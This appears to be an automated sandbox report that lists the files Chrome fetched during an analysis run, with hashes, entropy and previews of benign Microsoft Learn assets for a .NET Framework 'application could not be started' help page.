                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                                            SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
                                                                                                                                                                                                            Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 19696, version 1.0
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):19696
                                                                                                                                                                                                            Entropy (8bit):7.9898910353479335
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:37wfQhsuDSP36Elj0oScS8w3F1ZTt5JwtRGsh1SJR3YL0BeojRs8E:37Cms69owH3FPutReFYL+eods8E
                                                                                                                                                                                                            MD5:4D0BFEA9EBDA0657CEE433600ED087B6
                                                                                                                                                                                                            SHA1:F13C690B170D5BA6BE45DEDC576776CA79718D98
                                                                                                                                                                                                            SHA-256:67E7D8E61B9984289B6F3F476BBEB6CEB955BEC823243263CF1EE57D7DB7AE9A
                                                                                                                                                                                                            SHA-512:9136ADEC32F1D29A72A486B4604309AA8F9611663FA1E8D49079B67260B2B09CEFDC3852CF5C08CA9F5D8EA718A16DBD8D8120AC3164B0D1519D8EF8A19E4EA5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/docons.a1ef6ef.34a85e0c.woff2
                                                                                                                                                                                                            Preview:wOF2......L........`..L..........................T.V..@........6.$........ ..y.......d^..Awp(......<.1..fE.......I......z-.*."YTZ.p.eMd.#..7.qY..Z.!..V...!......r...Z.;b........J....X..;.^...>UQ%U..CkT.....zKG.!\8%..>.b.4o4.t*..........3..C..?u....E.S$.:.....mfZ......... .Q...].y.*.@....m.tC.C6. ......37..,V...F.a...A.. .PQ".A...B...p...q..!QA.N..m.......(..........gv..L...5M&._..+@.U..k.....CU..@...._.9q{....B..C.dB.F.a......J_Jo..M..oR....m......r...U0...y!.@-.h7...z....e.....J+...-{.s..1...^...zM[~....Fy.';.V..*.=.%......"..H..w.9L..$.{d.j&..... K...P`.$.g....;.0..........T.v....j.0Ht..<. ...<\......Ol.|_U.+rmW..JK..".e<C ...q.?...B..l..Ni.....H....D..n@.......=c.f3.7........t...Z...}{....S;..KU.Ho.`....._?m....y...32l^.(..r..........Z...{U....W(......|.q..P.`,.YQ....-,c...g*F..=....."M.......sq....-....w(.e.K........^2e.3&.|,..4.TO..D].........W..W%j.._...nS.X.gE..3;2..:...Y..4j.-....c0A...U...p......d.M..6.L..b....O:[['wN.|49.......]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/toc.json
                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):47062
                                                                                                                                                                                                            Entropy (8bit):5.016115705165622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:haAE16LIElO6L6x2bTI1ln4a1T0MCFnFMBVeZrdLg:hTAGLlO6eAbTIr4audZqBkZRLg
                                                                                                                                                                                                            MD5:B7BA0F1B4D3EE09BD4C1DD5EE8FA2633
                                                                                                                                                                                                            SHA1:A5725E0BD2E4DE3EB07E9C468306615CD0CE6955
                                                                                                                                                                                                            SHA-256:411BCF8F95DAF3C6D0BEBDFA4DDEFD0F947D2083C1A27BDD0E5D19BB6F299838
                                                                                                                                                                                                            SHA-512:59F535B445302E8A8398F02F7729D16236C629EB0967833257F8BA391A4E93B3A23A5FA3D64127EC117B8D93A6D7A9B86EBCB4B6E6F96CFF3B4DB3EE3C5F4844
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html..class="hasSidebar hasPageActions hasBreadcrumb conceptual has-default-focus theme-light"..lang="en-us"..dir="ltr"..data-authenticated="false"..data-auth-status-determined="false"..data-target="docs"..x-ms-format-detection="none">..<head>..<meta charset="utf-8" />..<meta name="viewport" content="width=device-width, initial-scale=1.0" />..<meta property="og:title" content="Fix .NET Framework 'This application could not be started' - .NET Framework" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started" /><meta property="og:description" content="Learn what to do if you see a 'This application could not be started' dialog box when running a .NET Framework application." /><meta property="og:image" content="https://learn.microsoft.com/dotnet/media/dotnet-logo.png" />...<meta property="og:image:alt" content="Fix .NET Framework 'This application could not be st
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):3130
                                                                                                                                                                                                            Entropy (8bit):4.790069981348324
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                                                            MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                                                            SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                                                            SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                                                            SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json
                                                                                                                                                                                                            Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):18367
                                                                                                                                                                                                            Entropy (8bit):7.7772261735974215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                                                            MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                                                            SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                                                            SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                                                            SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1154
                                                                                                                                                                                                            Entropy (8bit):4.59126408969148
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                                            MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                                            SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                                            SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
